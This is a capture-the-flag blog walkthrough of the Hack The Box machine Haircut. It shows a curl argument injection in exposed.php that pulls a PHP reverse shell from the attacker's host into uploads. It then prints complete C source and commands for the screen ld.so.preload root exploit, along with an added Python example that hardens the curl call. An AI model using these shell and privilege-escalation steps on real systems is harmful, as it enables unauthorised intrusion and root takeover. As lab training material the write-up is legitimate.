Haircut Hack the Box

dl padmavathi
Dec 12, 2020

The IP address of the box: 10.10.10.24

Observe that the nmap scan showed two open ports.

Opened port 80 in the browser and observed that the home page has an image file. Downloaded the image to check for any hidden parts, and also inspected the home page for any clues hidden in comments, but no luck.

Ran gobuster for any subdirectories present:

gobuster dir -u http://10.10.10.24:80/ -t 500 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

It found an uploads folder, which returns a 302 to uploads/, but uploads/ shows Forbidden.

So I ran file checks in uploads with the extensions php, html and text files, but found nothing.

gobuster dir -u http://10.10.10.24:80/ -t 500 -x php,html,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

I thought it was a dead end here and was checking port 22 for hints. I had totally forgotten that I had not run the file-extension check on the home folder, so I ran that:

Found exposed.php and went to that PHP file in the browser. It seems there is an LFI present; I just entered 123 to check what error it gives us.

As seen in the above image, curl is giving an error, so I thought of trying remote file inclusion.

Use the reverse shell from the URL below:

Start a Python server on the Kali machine where this reverse shell is present.

Tried curl to upload the reverse shell to the current web folder, but the app says permission denied.

We had observed there was an uploads folder, so tried to upload there with the command below:

http://10.10.14.13:8000/reverse_shell.php --output ./uploads/file.php

Observe in the above image that we were able to upload the reverse shell to the uploads folder.
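Why that input worked, and the check that stops it, as an added Python example rather than code from the original post or from the box. It assumes exposed.php splices the submitted text into a curl command line (its source is not shown here); ALLOWED_HOSTS, naive_tokens and build_curl_argv are hypothetical names, and the sample input is constructed.

```python
import shlex
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"intranet.example"}  # hypothetical allow-list, not from the box


def naive_tokens(user_input):
    """Tokens curl receives when a handler splices input into a shell string."""
    return shlex.split("curl " + user_input)


def build_curl_argv(user_input):
    """Return an argv list for curl, or raise ValueError unless input is one allowed URL."""
    # One token only: whitespace or control characters would smuggle extra arguments.
    if not user_input or any(c.isspace() or ord(c) < 0x20 for c in user_input):
        raise ValueError("input must be a single URL with no whitespace")
    # A leading dash would be parsed by curl as an option, not a URL.
    if user_input.startswith("-"):
        raise ValueError("input looks like a curl option")
    parts = urlsplit(user_input)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError("scheme not allowed")
    if parts.username or parts.password:
        raise ValueError("credentials in URL not allowed")
    if (parts.hostname or "").lower() not in ALLOWED_HOSTS:
        raise ValueError("host not on allow-list")
    # argv list (no shell), protocols pinned, and "--" ends curl's option parsing.
    return ["curl", "--silent", "--max-time", "5",
            "--proto", "=http,https", "--", user_input]


if __name__ == "__main__":
    sample = "http://192.0.2.10/page.php -o ./uploads/page.php"  # constructed input
    print("naive :", naive_tokens(sample))
    for candidate in (sample, "-o/tmp/x", "file:///etc/passwd",
                      "http://intranet.example/status"):
        try:
            print("ok    :", build_curl_argv(candidate))
        except ValueError as err:
            print("reject:", repr(candidate), "->", err)
```

The naive form hands curl a separate -o argument and output path, which is what let the file land in uploads; the hardened form only ever passes one validated URL after "--".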

Start a Netcat listener on my attacker Kali machine and go to the uploads reverse shell path in the browser.

Observe that we got the shell in the listener.

Now let’s run linpeas.sh for privilege escalation.

Get the script from here:

Observe that linpeas says the screen command can be used for privilege escalation.

After searching, found the exploit below:

It creates a C file as below:

libhax.c, which we compile as a shared object that we can load using preload

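#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>   /* chmod() */
#include <unistd.h>

/* Constructor: runs as soon as the dynamic loader maps this library. */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);      /* make root the owner of the helper binary */
    chmod("/tmp/rootshell", 04755);     /* set the setuid bit on it */
    unlink("/etc/ld.so.preload");       /* remove the preload file afterwards */
    printf("[+] done!\n");
}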

And rootshell.c as below:

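#include <stdio.h>
#include <unistd.h>     /* setuid(), setgid(), seteuid(), setegid(), execvp() */

int main(void){
    char *args[] = {"/bin/sh", NULL};   /* execvp() takes the path and an argv array */
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", args);
    return 1;                           /* reached only if execvp() fails */
}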

Compile the C file that has to be preloaded as below:

gcc -fPIC -shared -ldl -o libhax.so libhax.c

Compile the root shell as below:

gcc -o rootshell rootshell.c

Compile them as above, then run a Python server on the attacker Kali machine and fetch them to the victim machine.

Now navigate to /etc and run the commands below:

cd /etc
umask 000
/usr/bin/screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
/usr/bin/screen -ls
/tmp/rootshell

And observe we got root.

yaaaaaaaay


I go by Padma. I am a security enthusiast. This blog contains security related and some general stuff. E-mail:pduggire@gmu.edu